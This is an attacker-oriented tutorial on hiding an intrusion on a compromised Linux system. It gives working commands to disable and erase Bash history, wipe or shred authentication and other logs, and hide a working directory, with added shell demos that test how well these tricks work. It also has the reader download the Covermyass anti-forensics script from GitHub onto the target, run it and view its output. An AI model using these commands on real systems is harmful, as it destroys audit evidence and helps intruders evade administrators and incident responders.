Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected

Apr 16, 2021 08:00 PM
Apr 16, 2021 08:45 PM

For an attacker, the final stage of exploitation is covering their tracks: wiping the activity and logs that would otherwise reveal the intrusion. It's especially important for persistence, since a target that will be accessed again later has to look unremarkable to its administrators.

To show the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system. You can check out our Cyber Weapons Lab video that outlines this guide, or skip ahead to the written steps.

Step 1: Compromise a Target

The first thing we need to do is exploit the target. Here we use command injection, abusing the way the web application passes user input into OS commands, to get a shell. We'll also want to upgrade the new shell to a fully interactive one. Doing so makes it easier to work in general, and it also gives us tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

Step 2: Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most inexperienced admin, but another layer of discretion certainly couldn't hurt. First, let's locate directories that are writable by everyone (the -perm -222 test matches directories whose owner, group, and world write bits are all set) with the following command:

root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with the mkdir command by prepending the name with a dot. Note that /dev/shm is a tmpfs, so anything kept there disappears on reboot:

root@target:/# mkdir /dev/shm/.secret

If we list the contents of /dev/shm now, nothing shows up:

root@target:/# ls -l /dev/shm/

total 0

Only when we use the -a switch to list all files and directories does it show up:

root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret

And to remove the directory once we are finished on the machine, use the rmdir command:

root@target:/# rmdir /dev/shm/.secret/

Step 3: Delete the Bash History

Bash keeps the commands of the current session in an in-memory list and, for an interactive shell, writes that list to the history file when the session exits, so both the list and the file need dealing with to cover your tracks. We can view the current list with the history command:

root@target:/# history

    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

On exit, commands are written to the file named by the HISTFILE shell variable, which by default is ~/.bash_history. We can echo it to see the location:

root@target:/# echo $HISTFILE

/root/.bash_history

We can use the unset command to remove the variable; when HISTFILE is unset (or empty) at exit, Bash skips saving the history:

root@target:/# unset HISTFILE

So when we echo it again, nothing shows up:

root@target:/# echo $HISTFILE

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

root@target:/# export HISTFILE=/dev/null

And the history will now be sent to /dev/null (nowhere):

root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands kept in the in-memory list during the current session to 0 using the HISTSIZE variable, so nothing is stored to begin with:

root@target:/# HISTSIZE=0

Alternatively, use the export command:

root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Assigning it truncates the history file immediately, so setting it to 0 empties the existing ~/.bash_history on the spot:

root@target:/# HISTFILESIZE=0

Or with export:

root@target:/# export HISTFILESIZE=0

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@target:/# set +o history

And to enable it again:

root@target:/# set -o history

Similarly, the shopt command can be used to change shell options. With -o it operates on the same option names as set -o, so the following is equivalent to set +o history:

root@target:/# shopt -ou history

And to enable it again:

root@target:/# shopt -os history

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@target:~#  cat /etc/passwd

That technique only works when the HISTCONTROL variable contains ignorespace or ignoreboth (many distributions set it in the default user .bashrc, but root's shell or a shell spawned from an exploit often has it unset). Check with echo $HISTCONTROL before relying on it.

We can also clear the in-memory list using the -c switch:

root@target:~# history -c

To write the now-empty list over the history file on disk, use the -w switch:

root@target:~# history -w

Clearing alone only affects the current session's list; the file on disk is replaced when the shell exits. To make absolutely sure the history is cleared on the way out, the following command comes in handy:

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to send SIGKILL to the current shell ($$ is its PID), so it exits without running its exit handling and never writes the history file:

root@target:/# kill -9 $$
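To see how these settings actually interact, here is a small added demonstration (written for this edit, not part of the original article or of any tool it mentions). It starts a throwaway bash with a private history file, applies one of the settings above, runs a marker command, and reports whether the marker reached the file. Because a non-interactive bash does not save history on exit, the throwaway shell turns history on with set -o history and flushes it with history -w; the temporary paths and the marker command are constructed for the demo.

```shell
#!/bin/sh
# Added demonstration (not from the original article): run a throwaway bash
# with a private HISTFILE, apply one of the history settings discussed above,
# execute a marker command and report whether the marker reached the file.
# A non-interactive bash does not save history on exit, so the throwaway
# shell enables history with "set -o history" and flushes it with "history -w".
# Temporary paths and the marker command are constructed for the demo.

# history_saved SETTINGS CMD [AFTER]
#   SETTINGS: shell code run on the same line as "set -o history" (that line
#             is read before history is enabled, so it is never recorded)
#   CMD:      the command whose history entry we care about (a leading
#             space is preserved)
#   AFTER:    optional command run after CMD and before the flush
# Prints "yes" if CMD ended up in the private history file, else "no".
history_saved() {
    settings=$1
    cmd=$2
    after=${3:-:}
    dir=$(mktemp -d) || return 1
    hf="$dir/hist"
    : > "$hf"
    printf '%s\n' "set -o history; $settings" "$cmd" "$after" 'history -w' \
        > "$dir/run.sh"
    # Drop inherited history settings so only SETTINGS has an effect.
    env -u HISTCONTROL -u HISTIGNORE -u HISTSIZE -u HISTFILESIZE \
        -u HISTTIMEFORMAT -u BASH_ENV HISTFILE="$hf" \
        bash --norc --noprofile "$dir/run.sh" >/dev/null 2>&1 \
        || { rm -rf "$dir"; return 1; }
    if grep -q 'echo marker' "$hf"; then echo yes; else echo no; fi
    rm -rf "$dir"
}

history_saved '' 'echo marker'                          # yes: recorded by default
history_saved 'HISTSIZE=0' 'echo marker'                # no:  nothing kept in memory
history_saved 'HISTFILE=/dev/null' 'echo marker'        # no:  flush goes nowhere
history_saved '' ' echo marker'                         # yes: space alone does nothing
history_saved 'HISTCONTROL=ignorespace' ' echo marker'  # no:  space now honoured
history_saved '' 'echo marker' 'history -c'             # no:  list cleared before flush
```

The six calls at the bottom reproduce the points above: HISTSIZE=0 and HISTFILE=/dev/null both leave the file without the marker, a leading space only helps once HISTCONTROL contains ignorespace, and history -c before the flush drops everything recorded before it. Swap in any settings string to check what a particular target's configuration will actually do before relying on it.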

Step 4: Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain (names vary by distribution):

  • /var/log/auth.log Authentication (Debian/Ubuntu; /var/log/secure on Red Hat-style systems)
  • /var/log/cron.log Cron jobs (where cron is logged separately; it often goes to the main syslog file instead)
  • /var/log/maillog Mail (Red Hat naming; /var/log/mail.log on Debian/Ubuntu)
  • /var/log/httpd Apache (Red Hat naming; /var/log/apache2 on Debian/Ubuntu)
  • /var/log/wtmp, /var/log/btmp, /var/log/lastlog Binary login records read by last, lastb, and lastlog

On systemd-based systems, journald also keeps its own binary journal (under /var/log/journal when persistent, otherwise /run/log/journal), which these text files do not cover, and if logs are forwarded to a remote log server, nothing done locally removes the copies that have already been shipped.

Of course, we can simply remove a log with the rm command:

root@target:/# rm /var/log/auth.log

But that will likely raise red flags, and it has a second problem: the syslog daemon keeps its file descriptor open, so it carries on writing to the unlinked inode, the file doesn't reappear until the daemon is restarted, and the "deleted" data stays readable through /proc/<pid>/fd until then. It's better to empty the file in place rather than erase it. We can use the truncate command to shrink the size to 0:

root@target:/# truncate -s 0 /var/log/auth.log

Please note, truncate is not always present on all systems.

We can accomplish nearly the same thing by echoing into the file, though echo '' writes a single newline, so the file ends up one byte long rather than truly empty (echo -n '' > file would avoid that):

root@target:/# echo '' > /var/log/auth.log

And also with > by itself to empty the file:

root@target:/# > /var/log/auth.log

We can also send it to /dev/null:

root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with random data before it is removed. Note that shred's man page warns that overwriting is not guaranteed to destroy the old contents on journaling, copy-on-write, or snapshotting filesystems (ext3/ext4 in data=journal mode, btrfs, ZFS, and the like):

root@target:/# shred /var/log/auth.log

We can tack on -zu, where -z adds a final pass of zeros to hide the fact that the file was shredded and -u truncates and removes the file afterwards. Since that deletes the log, the open-descriptor problem described for rm applies here too:

root@target:/# shred -zu /var/log/auth.log
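The difference between deleting a log and emptying it matters because the daemon writing it keeps its file descriptor open. The following added example (constructed for this edit, not from the original article) uses the shell itself as a stand-in daemon holding fd 3 on a temporary file, and shows two things: after rm the "deleted" log is still readable through /proc/<pid>/fd, and truncating a file that a writer opened without O_APPEND leaves a hole of NUL bytes at the old offset, the kind of artifact an admin notices. The temporary paths and sample log lines are constructed; reading /proc/self/fd is Linux-specific.

```shell
#!/bin/sh
# Added demonstration (not from the original article). The current shell
# plays the role of a logging daemon: it holds fd 3 open on a temporary
# "auth.log" and keeps writing after the file is deleted or emptied.
# Paths and log lines are constructed; /proc/self/fd is Linux-only.

# Delete the log while fd 3 is still open, write one more entry, then read
# the unlinked inode back through /proc. Prints "<lines> <state>", where
# state is "deleted" when the descriptor points at a removed file.
rm_while_open() {
    d=$(mktemp -d); f="$d/auth.log"
    exec 3>>"$f"
    printf 'sshd[1]: Accepted password for root\n' >&3
    rm "$f"                                          # directory entry removed...
    printf 'sshd[1]: pam_unix: session opened\n' >&3 # ...but writes still land
    n=$(wc -l < /proc/self/fd/3 | tr -d ' ')         # inode readable until closed
    case $(readlink /proc/self/fd/3) in
        *'(deleted)') state=deleted ;;
        *)            state=present ;;
    esac
    exec 3>&-                                        # "daemon restart": data now gone
    rm -rf "$d"
    echo "$n $state"
}

# Empty the log in place while fd 3 is open ("append" mimics a daemon that
# opened with O_APPEND, "overwrite" one that did not), write one more
# 4-byte entry and print the resulting file size in bytes.
size_after_truncate() {
    mode=$1
    d=$(mktemp -d); f="$d/auth.log"
    if [ "$mode" = append ]; then exec 3>>"$f"; else exec 3>"$f"; fi
    printf '%s\n' 'old entry 1' 'old entry 2' >&3   # 24 bytes, fd offset now 24
    : > "$f"                                         # same effect as truncate -s 0
    printf 'new\n' >&3
    wc -c < "$f" | tr -d ' '
    exec 3>&-
    rm -rf "$d"
}

rm_while_open                   # 2 deleted
size_after_truncate append      # 4
size_after_truncate overwrite   # 28: a 24-byte hole of NULs, then "new"
```

The first call shows why rm (and shred -u) is the noisy option: both lines are still recoverable from the open descriptor, and on a real system ls -l /proc/<syslog-pid>/fd makes the removed file obvious. The other two show that emptying in place is clean only for writers that append; a non-appending writer resumes at its old offset and the truncated file grows back with a block of zero bytes in front of the new entries.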

Step 5: Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that automates much of the process we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Head to a writable directory (such as /tmp, where the script was saved here), and use chmod to make it executable:

root@target:/tmp# chmod +x covermyass

Then we can run it:

root@target:/tmp# ./covermyass

Welcome to Cover my ass tool !

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clear everything in a hurry, simply append now to the command:

root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Wrapping Up

Today, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

Cover image by Vojtech Okenka/Pexels
